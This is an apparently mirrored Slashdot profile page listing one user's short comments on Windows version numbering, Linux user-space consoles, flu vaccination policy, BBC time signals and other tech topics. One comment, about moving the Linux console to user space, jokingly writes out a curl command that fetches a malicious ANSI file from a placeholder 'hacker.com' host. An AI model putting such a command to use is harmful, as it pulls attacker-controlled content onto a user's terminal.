Slashdot Mirror


User: Marillion

Marillion's activity in the archive.

Stories
0
Comments
614
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 614

  1. Re:"Brigands" on DNA Fog Helps Identify Trespassers, Thieves, and Brigands · · Score: 1

    It's common in microbiology to insert Green Fluorescent Protein into lab strains microbes to make them more visible under microscopy.

  2. Re:When will it be open-sourced? on HP Discontinue OpenVMS · · Score: 1

    Reminds me of my favourite VMS source code joke: Bliss is ignorance.

  3. Re:Not-so-accurate source on BBC Clock Inaccurate - 100 Days To Fix? · · Score: 2

    BBC World Service presenters announce time in GMT. As a resident of Eastern North America, the time announced is always five hours ahead of my local time in Winter and four hours ahead in Summer. It's quite clear that the BBC World Service definition of GMT does not observe British Summer Time.

  4. Re:Wow... on Windows Blue Is Officially Windows 8.1, Free For Existing Users · · Score: 1

    Touché

  5. Re:Wow... on Windows Blue Is Officially Windows 8.1, Free For Existing Users · · Score: 5, Insightful

    If you want to consider how the engineers inside Microsoft think of the code base, I'd suggest considering how they internally number the versions. I think it's very insightful. The windows API has a self-identification function that returns the internal version numbering.
    Windows NT 4.0 self-identified as NT4.0
    Windows 2000 self-identified as NT5.0
    Windows XP self-identified as NT5.1
    Windows Vista self-identified as NT6.0
    Windows 7 self-identified as NT6.1
    Windows 8 self-identified as NT6.2

  6. Re:I remember seeing a whistle device... on 80FFTs Per Second To Detect Whistles (and Switch On Lights) · · Score: 1

    Except that for the one that I had you had to whistle something very close to a B-flat.

  7. Re:we won on CISPA Seems Dead In the US Senate · · Score: 1

    A Representative is a representative and a Senator is a representative. Capitalization matters. Classically, as in before the 17th Amendment, a Senator was selected by the State and thus a Senator represents his/her State. However, for the past 100 years, we directly elect Senators which requires campaigning before the electorate and we can spend all day discussing the shortcomings of the modern campaign and the questions and confusions of loyalties that result from that.

  8. Re:IPX & IPv6 on NetWare 3.12 Server Taken Down After 16 Years of Continuous Duty · · Score: 2

    I heard a guy claim that if Novell registered network numbers as ICANN does today and insisted that every site had a unique network number then IPX might have ended up being the dominate supporting protocol of the World Wide Web instead of IP. But since 99% of the sites used network #1, you couldn't route IPX among companies.

  9. Re:misuse of sentencing on Man Who Pointed Laser At Aircraft Gets 30-Month Sentence · · Score: 1

    If the point of a harsh sentence is to "send a message" then make the sentence one of spreading the message. Make this guy go around and EDUCATE others on the hazards of ignorant recklessness.

  10. Ex-Parrot on Terminator Sparrows? · · Score: 5, Funny

    Repeat experiment with parrots and ruin a perfectly good Monty Python skit.

  11. Re:AKA Google drives Bitcoin Into Mainstream use on Google Looks To Cut Funds To Illegal Sites · · Score: 4, Interesting

    It hasn't been declared illegal ... yet. Governments do tend to regard the minting of legal tender as their exclusive purview. The bitcoin community would do well to regard bit coins as "scrip" or "tokens" and not "currency." Lawyers love to sink their teeth into the legal definitions of words as opposed the common usage of words.

  12. Re:good thinking HA! on Moving the Linux Kernel Console To User-Space · · Score: 1

    And that only takes down one user process without taking down the whole system. That's an example of a bug in a common library. It's similar to all the sprintf exploits over the years.

  13. Re:good thinking HA! on Moving the Linux Kernel Console To User-Space · · Score: 1

    Running the console in User Space really meaning running a kernel thread in the unprivileged mode of the CPU. If you do a process listing on a current system, most of the PID's < 100 are user space threads launched from within the kernel itself and part of the kernel code base. These include things like USB management, software RAID, swapd, ext4-dio-unwrit. They don't create external dependencies. The chief benefit is that failures in those threads can't take the whole system down. I'm surprised we haven't seen a carefully crafted ANSI console attack hack circulating out there. "Hey kidz, try this: curl h**p://hacker.com/badansi.txt"

    While I fully respect the concern of preserving the access of last resort as it is, the only "emergency" I ever have ever needed to use a physical console is when network connectivity goes belly up and you have to fix the network configuration to the point that you can SSH back into it again.

  14. Re:They're worthless anyhow on Indiana Nurses Fired After Refusing Flu Shots On Religious Grounds · · Score: 1

    That isn't true. The WHO makes their best guess which strains will be most prevalent for that year. Sometimes they do well. Sometimes they don't. They did pretty good this year, the strain hitting the Northeast US (H3N2) was predicted, it's just a really nasty one. http://www.cdc.gov/flu/about/season/vaccine-selection.htm

  15. Re:Good on Indiana Nurses Fired After Refusing Flu Shots On Religious Grounds · · Score: 1

    I work at a major pediatric institution and like all the others, we've got a vaccination policy. All staff, whether front-line clinical care or back office, must get vaccinated either by the institution or by a primary care physician unless an employee has a qualifying contradiction. Employees are fully reimbursed if they choose to get vaccinated elsewhere. This year, the vaccination provided by the institution was the subcutaneous, attenuated live strain vaccination. Qualifying contradictions to vaccination include things like allergies to Thimerosal (a common preservative). To qualify for an exception, the contradiction must be supported by documentation from a physician. For the protection of patients, unvaccinated employees must stay home at the slightest suggestion of illness.

    If I were one of those nurses, I would have refused passively by finding a doctor from the underground network of physicians who will sign off on anything, get the paperwork, and then abide by the stay at home policies. Actively and publicly refusing on religious grounds is just being incendiary.

  16. Version Control Is Your Friend on What Are the Unwritten Rules of Deleting Code? · · Score: 4, Informative

    I really like git, but the key thing is to keep revision history. Deleted code is then never "deleted" it's just no longer cluttering up the screen. Of course it does mean you need to actually learn how to use a version control system beyond blind forward checkins.

  17. Re:Weigh your options on How Do YOU Establish a Secure Computing Environment? · · Score: 1

    I agree whole heartedly. The security curve is an asymptotic one. You'll never reach secure. The biggest security risk in any system (computer system or non-computer system) is the person sitting at the desk. This is why secretive government agencies like the US DoD don't let anyone use a DoD computer until they've background checked and taken the requisite training classes.

    This is Slashdot. Naturally, there will be amazing advice about elite encryption and protecting your most secretive plans from government spooks. Government? Really? Frankly, I'm more worried about the data that Visa and MasterCard have about me than the government stealing pictures of my kids marching band contests.

    The original poster asked valid questions about reasonable outside threats - Malware. I'm a fan of free (as in beer) scanners that detect known threats disguised in innocent looking payloads. That adorable icon that Aunt Betty says is adorable could be an installer for a malware program. Also, subscribe to CERT bulletins or a similar organization that publishes information about emerging threats and vulnerability.

  18. Re:Prisoners are getting used to being sodomized on Microsoft Has Been Watching, and It Says You're Getting Used To Windows 8 · · Score: 2

    This is Microsoft's equivalent of Steve Jobs saying “You're holding it wrong” when the iPhone 4 case was the antenna.

  19. Re: Thoughts on What Will NASA Do With Its Gifted Spy 'Scopes? · · Score: 1

    Excellent to know about Hubble. It's a shame too, I hear the bridges in New York are cheaper now because of the flood ...

  20. Re: Thoughts on What Will NASA Do With Its Gifted Spy 'Scopes? · · Score: 1

    That's a very good point - looking down. The luminance levels from earth are MUCH brighter than a distant object. I once heard (translation: totally unverified) that the Hubble team had to be careful not to aim it a the moon because it could overload and/or the sensor. So what will the try to image with it?

  21. Re:700TB not as exciting as it sounds on Titan Supercomputer Debuts for Open Scientific Research · · Score: 1

    The XE6 that my team uses allocates jobs reservations at the node level. Each job gets a whole node of 16 cores with 32G ram. If you have a memory intensive task, you only run use as many cores as will fit in the available memory. It's a trade-off: some tasks will waste RAM, some will waste CPUs?

  22. Re:Long term on Apple, ARM, and Intel · · Score: 5, Insightful

    If you measure operations per second, the x86 chip will win. If you measure operations per second per watt, the ARM chip will win.

  23. Re:Depends on Ask Slashdot: How Often Do You Push To Production? · · Score: 1

    I whole heartedly agree with this post.

    I'd like augment the remark about WHAT a company does. If your company is in the financial services sector in the US, then there are Sarbanes/Oxley regulations that must be satisfied. If your company is in the healthcare industry, there are privacy laws. If you're in the aviation industry, there's the FAA. And so on ...

    Also don't feel like you have to push out updates every week because it's the cool and trendy thing to do. Do it because there is a rational justification for doing so.

  24. Re:TCP Fast Open on Linux 3.6 Released · · Score: 5, Interesting

    On the and-user client side, there may not be much noticeable improvement. But on servers and/or load-balancing front ends this type of improvement could be quite significant.

  25. Re:Lefty here, and I can't stand left handed mice on Confessions of a Left-Handed Technology User · · Score: 1

    My mouse left-handed with unswapped buttons. Although I'm not strongly left-handed. My sister, however, is militantly left-handed and she swaps the buttons. Drives me nuts.